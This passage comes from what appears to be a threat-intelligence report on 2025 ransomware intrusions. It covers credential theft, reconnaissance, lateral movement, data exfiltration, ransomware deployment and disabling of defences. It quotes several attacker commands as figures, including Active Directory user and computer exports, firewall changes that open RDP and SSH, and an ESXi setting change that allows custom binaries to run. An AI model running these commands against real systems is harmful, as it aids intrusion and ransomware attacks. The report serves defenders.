<div><table border="1px" cellpadding="16px"><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><span>ANYDESK</span></p>
</td>
<td>
<p><span>ATERA</span></p>
</td>
<td>
<p><span>CHROMEREMOTEDESKTOP</span></p>
</td>
</tr>
<tr>
<td>
<p><span>DAMEWARE</span></p>
</td>
<td>
<p><span>DWAGENT</span></p>
</td>
<td>
<p><span>MESHAGENT</span></p>
</td>
</tr>
<tr>
<td>
<p><span>RUSTDESK</span></p>
</td>
<td>
<p><span>SCREENCONNECT</span></p>
</td>
<td>
<p><span>SPLASHTOP</span></p>
</td>
</tr>
<tr>
<td>
<p><span>TERAMIND</span></p>
</td>
<td> </td>
<td> </td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<span>Table 2: Legitimate remote access tools used to establish a foothold and maintain a presence</span></div></div>
<div class="block-paragraph_advanced"><h4><span>Escalate Privileges</span></h4>
<p><span>Gaining access to highly privileged accounts is a critical step for ransomware actors as it enables further stages of the attack, such as disabling AV software, deleting backups, and deploying ransomware across the network. Threat actors continue to rely on a variety of privilege escalation tools and techniques, including leveraging MIMIKATZ, dumping credentials stored by the Windows operating system, and abusing Active Directory (AD).</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>We observed threat actors leverage MIMIKATZ in approximately 18% of ransomware intrusions in 2025, demonstrating a slight, but continued decline in its overall use in recent years dropping from use in 20% of all ransomware intrusions in 2024. Notably, we observed a decline in other publicly available privilege escalation and credential stealing tools as well; for example, we did not observe LAZAGNE in any ransomware intrusions in 2025, a reduction from 2% of intrusions in 2024, 4% in 2023, and 6% in 2022.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Consistent with recent years, throughout 2025 threat actors used a myriad of techniques to target Windows authentication systems to gain access to privileged accounts.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>We observed threat actors frequently attempting to obtain credentials stored by Windows systems by dumping the Local Security Authority Subsystem Service (LSASS) process memory, copying the Active Directory domain database (NTDS.dit) file, and exporting the Security Account Manager (SAM), SYSTEM, and SECURITY registry hives.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>Other observed methods include Kerberoasting, modifying the registry to enable WDigest credentials caching, and the recovery of credentials via the Windows Data Protection API (DPAPI).</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>Threat actors routinely elevated privileges of compromised and actor-provisioned accounts by adding them to local and domain administrator groups and/or granting the accounts additional privileges such as SeRemoteInteractiveLogonRight, SeDebugPrivilege, SeLoadDriverPrivilege, and SeBackupPrivilege.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>In some intrusions, threat actors abused AD roles to obtain elevated privileges through a variety of means, including DCSync replication and the misuse of AD Certificate Services (AD CS). In a MEDUSALOCKER.V2 incident, the threat actors executed the "Move-ADDirectoryServerOperationMasterRole" cmdlet to transfer Flexible Single Master Operation (FSMO) roles from the victim's AD domain controller to a suspected rogue domain controller.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>We observed multiple threat actors attempt to harvest credentials from various internal sources, including backup tools, browsers, password managers, and credentials stored in cleartext.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>In approximately 10% of intrusions we observed threat actors targeting Veeam Backup &amp; Replication for credential harvesting, which is consistent with activity observed in 2024. Multiple threat actors used the publicly available Veeam-Get-Creds.ps1 script or custom PowerShell scripts to obtain credentials stored in the Veeam configuration database.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>In a handful of incidents, threat actors targeted Chromium-based browsers to obtain stored credentials. For example, in an UNC2165 RANSOMHUB incident, the threat actors executed inline PowerShell to retrieve and decrypt DPAPI-protected master encryption key from the Local State files of Google Chrome and Microsoft Edge allowing access to stored credentials within the browsers.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>Threat actors accessed or attempted to access common password management tools, including KeePass, Bitwarden, and the Windows Credential Manager. During one UNC2465 intrusion involving AGENDA ransomware, the threat actor accessed a self-hosted Bitwarden server and exported and exfiltrated the contents of the vault database.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>During a REDBIKE ransomware incident, the threat actor likely harvested a cleartext password from a SonicWall appliance, which was also shared with an admin account, granting the actor domain administrator privileges.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>During one ransomware incident targeting a victim's virtualized environment, the threat actor exploited CVE-2024-37085 to gain administrator access to an ESXi hypervisor.</span></p>
</li>
</ul>
<h4><span>Internal Reconnaissance</span></h4>
<p><span>In 2025, the tactics leveraged for internal reconnaissance remained fairly consistent with recent years; threat actors continued to rely on native system utilities, PowerShell commands, and publicly available software.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Threat actors consistently used PowerShell to query Active Directory (AD) objects for running processes, network shares, and user group memberships. This activity ranged from using native cmdlets like Get-ADComputer and Get-ADUser to using script blocks to query other system data.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>In several cases, threat actors used Get-ADComputer and Get-ADUser to export lists of AD objects to a separate file. For example, in an incident involving MEDUSALOCKER.V2, the threat actors queried specific user object properties, exported account identity, contact information, and organizational metadata (Figure 8). At the same incident, the threat actors executed a different command to query domain-joined computers, capturing properties such as the operating system (OS), IPv4 address, and last logon date (Figure 9).</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>In some instances, threat actors executed PowerShell script blocks that ran a multitude of commands at once. For example, in an INTERLOCK incident, the threat actors ran a condensed one-line script that performed user profiling—including identifying the current user's username, Security Identifier (SID), and group memberships—checked for a domain connection, and enumerated the Domain Admins group. Notably, the script included a jitter, or time delay, to create random pauses between command execution, likely in an attempt to evade detection against rapid-fire command execution.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>Threat actors continued to rely heavily on internal Windows utilities in this phase of the attack lifecycle, including ipconfig, netstat, ping, and nltest, among others.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Publicly available reconnaissance utilities were used in numerous intrusions. These publicly available tools ranged from those specialized in probing networks, such as Advanced IP Scanner, Softperfect Network Scanner (NETSCAN), and Angry IP Scanner, to red-teaming tools like PowerSploit and IMPACKET. Notably, network reconnaissance utilities like Advanced IP Scanner, NETSCAN, and Angry IP Scanner were used in approximately 50% of intrusions, similar to their observed usage in 2023 and 2024.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>We often saw threat actors accessing files and folders related to potentially sensitive information. In some cases, they appeared to search for backup scripts and password managers, while in other cases they were likely attempting to find sensitive files to exfiltrate in order to increase the pressure applied by data theft extortion.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>In a REDBIKE intrusion, the threat actors searched for keywords like "passport," "i9," and "cyber insurance." In addition to searching for personally identifiable information (PII) like passports and employment eligibility forms, it is plausible that the threat actors were also seeking to obtain the victim's cyber insurance policies to help them determine a negotiation strategy or maximum ransom amount to demand.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>Several threat actors performed targeted internal reconnaissance for information about virtualized infrastructure within the victim environment, likely to facilitate ransomware deployment on these systems. In a REDBIKE incident, threat actors enumerated hypervisors by running the Get-VM cmdlet and accessed the internal VMware vSphere web portal.</span></p>
</li>
</ul></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>powershell Import-Module ActiveDirectory; Get-ADUser -filter * -properties Enabled,DisplayName,Mail,SAMAccountName,homephone,ipphone,TelephoneNumber,comment,description,title | select Enabled,DisplayName,Mail,SAMAccountName,homephone,ipphone,TelephoneNumber,comment,description,title | export-csv C:\Users\Public\Music\users.csv </code></pre>
<p><span>Figure 8: Get-ADUser HostCmd</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>powershell Import-Module ActiveDirectory; Get-ADComputer -Filter {enabled -eq $true} -properties *|select comment, description, Name, DNSHostName, OperatingSystem, LastLogonDate, ipv4address | Export-CSV C:\users\public\music\AllWindows.csv -NoTypeInformation -Encoding UTF8</code></pre>
<p><span>Figure 9: Get-ADComputer HostCmd</span></p></div>
<div class="block-paragraph_advanced"><h4><span>Lateral Movement</span></h4>
<p><span>Throughout 2025, actors extensively used common built-in protocols, including RDP, Server Message Block (SMB), and Secure Shell (SSH), combined with compromised credentials or attacker-created accounts for lateral movement. We also observed actors leveraging a variety of tools and utilities to tunnel and proxy traffic within victim environments.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>In approximately 85% of intrusions, threat actors leveraged RDP with either compromised or attacker-created accounts for lateral movement.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Across a range of incidents we observed threat actors leveraging SMB for lateral movement to access network shares, stage payloads, and execute remote commands.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>During one SAFEPAY ransomware incident, the threat actor leveraged SMB to access various network shares and used this access to stage a copy of NETSCAN on multiple hosts.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>We also observed multiple actors leverage IMPACKET.SMBEXEC to execute remote commands. For example, in one intrusion leading to MEDUSALOCKER.V2 ransomware, the threat actor leveraged IMPACKET.SMBEXEC to run commands to create a new local administrator account on a remote host.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>Across numerous incidents we observed various threat actors leverage common public utilities like PuTTY and KiTTY to establish SSH connections to hosts, particularly when moving laterally to ESXi systems.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>We continued to observe frequent use of common Windows utilities like PsExec, Windows Remote Management (WinRM), and to a lesser extent Windows Management Instrumentation Command-line (WMIC), for remote execution and lateral movement.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>In a handful of intrusions, threat actors used PowerShell to establish interactive remote sessions via WinRM using the "Enter-PSSession" cmdlet.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>In an UNC5774 INTERLOCK ransomware incident, the threat actors used WinRM to establish a connection to a domain controller and execute remote commands, including using net.exe to reset the password of a user account.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>During an UNC2465 incident, the threat actor moved laterally by using WMIC to execute a SMOKEDHAM payload on a remote host.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>In numerous incidents, threat actors manipulated firewall rules in order to enable different types of traffic, such as RDP or SMB, to be allowed within the victim environment.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>In one incident, UNC6021, a suspected FIN6 threat cluster, created a scheduled task that ran a netsh command to modify firewall rules to enable remote desktop access (Figure 10).</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>During one UNC6276 intrusion, the threat actor disabled the firewall on an ESXi host before deploying SYSTEMBC.LINUX on the host.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>In one incident the threat actor installed OpenSSH on a host and ran a PowerShell command to configure a new firewall rule to allow inbound traffic on port 22 (Figure 11).</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>In an intrusion leading to the deployment of INC ransomware, the threat actor leveraged an attacker-created account to create new firewall policies that granted access to multiple additional subnets within the network.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>Threat actors leveraged a variety of malicious and legitimate utilities to tunnel and proxy traffic within victim networks, including SYSTEMBC, VIPERTUNEL, PYSOXY, CLOUDFLARED, and OpenSSH. During one LOCKBIT.WARLOCK intrusions the threat actor leveraged CLOUDFLARED to tunnel an RDP connection between two hosts.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>In a minimal number of incidents, threat actors leveraged publicly available post-exploitation tools including METASPLOIT and AMNESIAC.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Threat actors often abused access to various management consoles for virtual systems to move laterally to virtual hosts. </span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>In multiple instances, the threat actors appeared to leverage this access to enable SSH on ESXi hosts prior to establishing SSH connections for lateral movement. For example, in a FOULFOG.LINUX incident, threat actors leveraged access from the victim's VMware vSphere centralized management portal to enable SSH on a vm-host, created user root1, SSHed using the newly created user, and disabled firewall.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>During one incident the threat actor leveraged access to the victim's Nutanix Prism Central management tool along with a compromised account to move laterally to multiple additional systems. In the same incident, the threat actor also used the VMware web user interface to access numerous ESXi hosts.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>In a subset of intrusions we observed evidence of threat actors conducting bruteforce attacks to gain access to accounts on additional systems.</span></p>
</li>
</ul></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>cmd.exe /C netsh advfirewall firewall set rule group="remote desktop" new enable=No</code></pre>
<p><span>Figure 10: netsh command to modify firewall rules to enable remote access</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>powershell.exe -Command New-NetFirewallRule -Name sshd -DisplayName 'OpenSSH Server (sshd)' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22</code></pre>
<p><span>Figure 11: PowerShell command to allow inbound SSH traffic</span></p></div>
<div class="block-paragraph_advanced"><h4><span>Complete Mission</span></h4>
<p><span>The following sections highlight observations from the complete mission phase of the attack lifecycle, covering ransomware deployment, data exfiltration, and anti-analysis and recovery techniques. Threat actors conducting ransomware attacks routinely conduct multifaceted extortion operations involving data theft as it provides additional leverage during negotiations. Threat actors also consistently engage in a diverse range of tactics to ensure the success of their operations and reduce the ability for victims to recover, including tampering with security software, deleting backups, and clearing logs. Notable trends in 2025 include the prevalence of REDBIKE ransomware, an increase in the percentage of incidents involving data theft extortion, and indications that the techniques used to target virtual systems may be maturing.</span></p>
<h4><span>Ransomware Families</span></h4>
<p><span>REDBIKE was the most prominent ransomware observed in 2025 Mandiant incident response investigations, followed by AGENDA and then INC ransomware (Figure 12). In 2024, REDBIKE was tied for the number one spot with LOCKBIT.BLACK and RANSOMHUB; however, in 2024 LOCKBIT experienced significant disruptive actions stemming from law enforcement actions and in 2025 RansomHub abruptly ceased operations. Throughout 2025 we also observed a handful of incidents involving newly identified ransomware, such as NINTHBEE and SILVERPINE, demonstrating that at least a subset of threat actors are developing and maintaining new ransomware families.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>REDBIKE was seen in almost 30% of 2025 ransomware incidents, surpassing previous highs for single ransomware families, including LOCKBIT and ALPHV reaching 17% each in 2023.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>We continue to observe threat actors reusing existing ransomware families in seemingly unrelated operations conducted under different extortion brands.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>While we have seen a significant decrease in LOCKBIT ransomware incidents since the legal actions taken against the RaaS in 2024, in 2025 we did observe a handful of LOCKBIT.WARLOCK incidents. The WarLock DLS emerged in July 2025 and has listed over 75 victims since. LOCKBIT.WARLOCK largely leverages the original LOCKBIT codebase; however, it uses different encryption algorithms, and refactors previously inlined operations into dedicated functions.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>In 2025, we observed a handful of intrusions involving CONTI ransomware, though the CONTI RaaS was shut down in May 2022 following the leak of associated chat logs and the CONTI source code. For example, we observed CONTI deployed in a 2025 incident associated with the Gunra ransomware group; analysis of the ransomware payload identified it was heavily based on CONTI's source code, with slight variations in obfuscation.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>We observed three different extortion brands leveraging INC ransomware in their operations: INC Ransom, Sinobi, and Lynx. The INC ransomware source code was advertised in an underground forum in May 2024 but the Lynx and INC Ransom DLS domains were acquired by a common threat actor.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>GTIG observed ODDSIDE ransomware in an incident in 2025; ODDSIDE is PowerShell-based ransomware that refers to itself as DARKMATTER. While not completely unheard of, PowerShell-based ransomware is fairly rare.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Notably, in one incident we observed threat actors deploy CLOP ransomware. This is the first time we’ve responded to a CLOP ransomware incident since 2020, though we have occasionally identified CLOP ransomware samples uploaded to malware repositories. In recent years, threat actors associated with the CL0P data leak site have primarily conducted data-theft-extortion-only operations rather than performing encryption.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>In a subset of incidents, we were unable to obtain the ransomware payloads. For example, we observed a handful of TridentLocker-branded ransomware incidents in which there is evidence to suggest that the ransomware payload was executed in memory. It's plausible the threat actors used in-memory execution to deploy ransomware to try and bypass security detections and potentially make analysis and recovery efforts more difficult.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Threat actors occasionally abuse legitimate encryption tools in their extortion operations. In 2025, we observed an incident in which threat actors used BitLocker to encrypt over 200 remote hosts.</span></p>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2025-ransomware-trends-fig12.max-1000x1000.png" alt="Distribution of ransomware families observed in 2025 investigations">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="fy140">Figure 12: Distribution of ransomware families observed in 2025 investigations</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><div align="center">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td colspan="3">
<p><strong><span>Ransomware Families Observed in 2025 Mandiant Investigations</span></strong></p>
</td>
</tr>
<tr>
<td>
<p><span>AGENDA</span></p>
<p><span>AGENDA.ESXI</span></p>
<p><span>AGENDA.RUST</span></p>
</td>
<td>
<p><span>BABUK</span></p>
<p><span>BABUK.MARIO</span></p>
</td>
<td>
<p><span>CLOP</span></p>
</td>
</tr>
<tr>
<td>
<p><span>CONTI</span></p>
</td>
<td>
<p><span>CRYTOX</span></p>
</td>
<td>
<p><span>DOLLARLOCKER</span></p>
</td>
</tr>
<tr>
<td>
<p><span>FOULFOG.LINUX</span></p>
</td>
<td>
<p><span>INC</span></p>
<p><span>INC.LINUX</span></p>
</td>
<td>
<p><span>INTERLOCK</span></p>
</td>
</tr>
<tr>
<td>
<p><span>LOCKBIT.UNIX</span></p>
<p><span>LOCKBIT.WARLOCK</span></p>
</td>
<td>
<p><span>MEDUSALOCKER.V2</span></p>
</td>
<td>
<p><span>NINTHBEE</span></p>
</td>
</tr>
<tr>
<td>
<p><span>NITROGEN</span></p>
</td>
<td>
<p><span>ODDSIDE</span></p>
</td>
<td>
<p><span>PLAYCRYPT</span></p>
</td>
</tr>
<tr>
<td>
<p><span>RANSOMHUB</span></p>
</td>
<td>
<p><span>REDBIKE</span></p>
</td>
<td>
<p><span>RHYSIDA</span></p>
</td>
</tr>
<tr>
<td>
<p><span>RIFTTEAR</span></p>
</td>
<td>
<p><span>SAFEPAY</span></p>
</td>
<td>
<p><span>SILVERPINE</span></p>
</td>
</tr>
<tr>
<td>
<p><span>WHITERABBIT</span></p>
</td>
<td> </td>
<td> </td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<span>Table 3: Ransomware families observed in Mandiant's 2025 incident response investigations</span></div></div>
<div class="block-paragraph_advanced"><h4><span>Data Exfiltration</span></h4>
<p><span>In 2025, we observed confirmed or suspected data theft in approximately 77% of ransomware intrusions, a notable increase from approximately 57% in 2024. In these incidents, the most frequently observed strategies for identifying, staging, and exfiltrating data included the use of legitimate data synchronization tools such as Rclone and MEGASync, file compression using built-in tools or portable versions of WinRar or 7Zip, and FTP clients such as Filezilla or Winscp.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>During intrusions where data was stolen, we routinely observed threat actors targeting a variety of sensitive data types, including legal, human resources, accounting, and business development data.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>We observed evidence of threat actors conducting manual reconnaissance of systems likely to gather sensitive data for exfiltration such as accessing emails and attempting to access SharePoint and other Microsoft 365 environments via the browser.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>In 2025, threat actors continued to rely on publicly available tools and utilities—including Rclone, MEGASync, Megatools, restic, and possibly Cyberduck—to exfiltrate data.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>We observed Rclone in approximately 28% of intrusions where data theft was confirmed or suspected to exfiltrate data to attacker-controlled infrastructure.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>In one INC ransomware incident, the threat actor used the wget and curl commands to download Rclone and an INC.LINUX ransomware payload respectively to a network-attached storage (NAS) server. The threat actor subsequently ran Rclone to exfiltrate data from the server prior to manually executing the INC.LINUX payload.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>Threat actors installed and/or leveraged legitimate FTP/SFTP clients in 26% of intrusions where data theft was observed or suspected. Commonly observed software included FileZilla, WinSCP, and PuTTY Secure Copy.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>While not confirmed to be used for data exfiltration, we observed threat actors installing and/or executing various utilities that could be used to aid in the reconnaissance, staging, and export of stolen data such as Total Commander, Xcopy, and Gpg4win.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>Threat actors leveraged a myriad of legitimate cloud services and infrastructure to exfiltrate stolen data, including Azure, AWS, Backblaze, Cloudzy, Filemail, Google Drive, and MEGA, and OneDrive.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>In one UNC5471 intrusion leading to AGENDA ransomware, the threat actor leveraged batch scripts alongside WinRAR to automate the archiving of files in directories. The actor then used Megatools and SLEETSEND to exfiltrate the data to the MEGA and Cloudzy cloud storage services.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>We observed multiple threat actors transferring stolen data to attacker-controlled OneDrive accounts. During one UNC5496 intrusion, the threat actor ran commands to have Rclone transfer all files that matched a list of common file extension types to a threat actor-controlled OneDrive account.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>In multiple incidents, we observed threat actors leveraging AzCopy to transfer stolen files to attacker-controlled Azure storage.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>During one UNC6098 intrusion, the threat actor leveraged the SQL Server Import and Export Wizard to export a SQL database.</span></p>
</li>
</ul>
<h4><span>Ransomware Deployment</span></h4>
<p><span>We observed a diverse set of ransomware deployment techniques leveraged in intrusions throughout 2025. Threat actors employed both manual and automated deployment techniques, including the use of batch scripts, scheduled tasks, Group Policy Objects (GPOs), registry keys, and PowerShell scripts. Notably, in almost 20% of incidents, threat actors targeted virtualization infrastructure, and we observed multiple incidents where operators automated portions of their ransomware deployment against ESXi hosts, suggesting techniques used to target virtual systems may be maturing.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Threat actors often relied on automated mechanisms to deploy ransomware. In many cases, they relied on native Windows mechanisms to facilitate ransomware execution.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>Multiple threat clusters leveraged batch scripts to facilitate ransomware payload execution in victim environments. In one LOCKBIT.WARLOCK intrusion, the threat actor staged NetExec on a domain controller along with files to run the ransomware payload. The threat actor then used NetExec to copy a batch file to numerous hosts via SMB and run it to execute the ransomware payload.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>In a separate LOCKBIT.WARLOCK intrusion, the threat actor staged ransomware payloads on multiple hosts via SMB before executing them via scheduled tasks.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>During a NINTHBEE ransomware incident, the threat actor modified a GPO to include a malicious scheduled task that disabled Windows Defender and subsequently executed the ransomware payload. In the same intrusion, the threat actor also attempted to execute the NINTHBEE payload on multiple remote hosts via PsExec.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>In an incident likely involving DOLLARLOCKER, a threat actor created a Windows service to run a command to execute the ransomware payload.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>Multiple threat clusters leveraged the Windows Registry to complete their ransomware deployment objectives. During an UNC5471 intrusion, the threat actor created registry Run keys to execute AGENDA ransomware on multiple servers persistently. In one INTERLOCK ransomware intrusion, following encryption, the threat actor modified the LegalNoticeCaption and LegalNoticeText registry values to display a banner indicating the system was ransomed on start up.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>In addition to using SMB to stage ransomware payloads, we also observed threat actors leverage SMB to facilitate more expansive ransomware deployment across victim networks. In one incident, actors identified network shares via the "Invoke-ShareFinder" PowerShell cmdlet and likely supplied this list to REDBIKE as a list of targets. Ultimately, encryption was attempted on more than 500 endpoints via SMB.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>In a small subset of observed intrusions, threat actors leverage PowerShell to automate the deployment of BitLocker encryption across victims' environments. During one intrusion, the threat actor used a PowerShell script to install, configure, and assign passwords for BitLocker on multiple hosts. The threat actor then enabled encryption on multiple drives on these hosts and scheduled a system restart to force the hosts into a locked state. The actor also modified the registry to display a ransom note on the BitLocker preboot recovery screen.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>In approximately 43% of ransomware intrusions we responded to in 2025, the threat actors were observed targeting virtualization infrastructure, an increase from 29% in 2024. While ransomware deployment to virtual systems is often done manually, in 2025 we observed at least some incidents where threat actors attempted to automate portions of the ransomware deployment stage.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>During an UNC5495 intrusion, the threat actor automated the deployment of BABUK.MARIO by leveraging a batch script that accepted credentials for ESXi hosts. The batch script used a staged copy of KiTTY to copy the ransomware payload to the host and then connect via SSH and run a command to execute the payload on each host. In a separate intrusion, a threat actor leveraged a PowerShell script to authenticate to the victim's vCenter server, set new root passwords, and enable SSH on ESXi hosts. The same script was used to subsequently copy a RIFTEAR ransomware payload to the hosts, delete backups, shutdown virtual machines (VMs), and disable security policies prior to executing the ransomware payload.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>Prior to ransomware deployment on ESXi hosts, threat actors commonly disabled the ExecInstalledOnly setting on hosts to allow for the execution of custom binaries (Figure 13). During one intrusion, the threat actor also accessed a vCenter server and modified the Lockdown Mode Exception Users settings, which controls users that are allowed to maintain privileges when the host is in lockdown mode.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Across multiple intrusions, threat actors took steps to stop virtual machines and unlock files prior to decryption, almost certainly to maximize the impact of their ransomware payloads.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>In multiple instances threat actors used or attempted to use IOBIT, a legitimate uninstaller utility, to unlock files in use by other programs prior to executing ransomware payloads.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>We also observed multiple actors shutting down virtual machines and deleting backups and snapshots prior to encryption. In at least one intrusion, an actor leveraged a PowerShell script to automate the process of powering off virtual machines.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>During one intrusion, the threat actor accessed the victim's Commvault server and deleted vCenter backup volumes prior to encryption to hinder recovery.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>During a TridentLocker-branded ransomware incident, we assess with moderate confidence that the threat actor leveraged the same CrushFTP preview hijacking technique used for WAVECALL persistence to download and execute a ransomware payload from the WAVECALL C2 server.</span></p>
</li>
</ul></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>esxcli system settings advanced set -o /User/execInstalledOnly -i 0</code></pre>
<p><span>Figure 13: Command to disable ExecInstalledOnly setting on ESXi hosts</span></p></div>
<div class="block-paragraph_advanced"><h4><span>Anti-Detection, Analysis, and Recovery Tactics</span></h4>
<p><span>Ransomware actors consistently engage in anti-detection, anti-analysis, and anti-recovery tactics in their operations in an effort to not only prevent detection during the intrusion, but increase the difficulty for victims to recover post-encryption. While these tactics are often manually performed by threat actors, numerous ransomware families feature built-in capabilities to hinder analysis and delete backups prior to encryption.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Threat actors consistently disabled and tampered with security controls during ransomware intrusions to avoid detection and/or block of execution of malicious payloads. Most commonly, we observed threat actors disabling Windows Defender, often by modifying the Windows registry. In some other cases, the threat actors modified Defender configurations via the Set-MpPreference PowerShell cmdlet to add exclusions for their malware and ransomware payloads. Threat actors also were observed leveraging GPOs, scheduled tasks, and PowerShell scripts in order to tamper with a variety of security controls.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>In a REDBIKE incident, threat actors used PowerShell to disable a multitude of Windows Defender features by running commands to modify a variety of values associated with Windows Defender registry keys, including DisableRealtimeMonitoring, DisableScanOnRealtimeEnable, and DisableOnAccessProtection (Figure 14).</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>In an intrusion involving WHITERABBIT, threat actors executed a Base64-encoded PowerShell command that used the "Add-MpPreference" cmdlet to modify the Defender Exclusion list to include the ransomware binary; a variety of file extensions, such as ".cmd," ".bat," and ".exe"; as well as User Data folders.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>In an incident involving NINTHBEE, threat actors registered a scheduled task to execute daily a command that disables Microsoft Defender's real-time scanning for downloaded files and email attachments.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>Ransomware actors often deleted artifacts and cleared event logs to remove evidence of their activity. These records included information about command execution, firewall traffic, and stolen credentials. The wevtutil utility was used to facilitate log deletion in multiple instances.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>In a FOULFOG.LINUX incident, the threat actors renamed the ransomware binary to a less suspicious name, "filerw"; deleted the command history for the system; and created an empty file to replace the deleted file.</span></p>
</li>
</ul>
<li aria-level="1">
